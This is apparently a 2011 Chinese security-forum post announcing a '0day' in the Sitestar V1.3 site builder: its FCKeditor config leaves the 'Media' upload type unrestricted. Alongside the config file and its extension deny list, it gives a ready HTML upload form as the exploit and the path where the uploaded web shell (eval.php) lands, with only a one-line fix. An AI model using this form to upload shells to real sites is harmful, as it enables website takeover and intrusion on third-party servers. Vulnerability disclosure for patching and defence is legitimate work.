蓝盟诗人[LUC]蓝客联盟

建站之星sitestar V1.3 通杀0day

2011-10-24 21:03 作者: 来源: 本站 浏览: 3,004 views 我要评论 字号:

发布日期:2011-01.15
发布作者:udb311

影响版本:sitestar V1.3
官方网站:http://www.sitestar.cn

漏洞类型:文件上传
漏洞描述:此漏洞存仍然存在于FCK上传,程序采用了FCKeditor Version 2 .0。除了xiaocao 童鞋发布的建立1.ASP文件夹漏洞,还存在上传php脚本漏洞。
关键字:保留吧,以免批量

[code][/code][/code]

漏洞文件:/admin/fckeditor/upload/config.php

  1. <?php
  2. //省略代码
  3. // Due to security issues with Apache modules, it is reccomended to leave the
  4. // following setting enabled.
  5. $Config['ForceSingleExtension'] = true ;
  6. $Config['AllowedExtensions']['File']    = array() ;
  7. $Config['DeniedExtensions']['File']     = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;
  8. $Config['AllowedExtensions']['Image']   = array('jpg','gif','jpeg','png') ;
  9. $Config['DeniedExtensions']['Image']    = array() ;
  10. $Config['AllowedExtensions']['Flash']   = array('swf','fla') ;
  11. $Config['DeniedExtensions']['Flash']    = array() ;
  12. ?>

[/php]

看代码,这是修改过的FCKeditor配置文件。未对'Media'进行限制,导致可以上传任意文件。

测试方法:

和Fckeditor 2.4.2 原理一样。

http://www.hackline.net/a/news/ldfb/web/2009/1013/1005_2.html

上传EXP:

 <form id="frmUpload" enctype="multipart/form-data" action="http://www.hackline.net/admin/fckeditor//upload//upload.php?Type=Media" method="post">
Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>

上传shell地址:

http://域名/upload/media/eval.php

上图证明:

建站之星sitestar V1.3 通杀0day

漏洞修复:同理

修改config文件,限制上传目录的脚本执行权限。

打印
分享到:
复制链接

发表评论

*

* (保密)

Ctrl+Enter 快捷回复

会员登录关闭

记住我 忘记密码

注册会员关闭

小提示: 您的密码会通过填写的"电子邮箱"发送给您.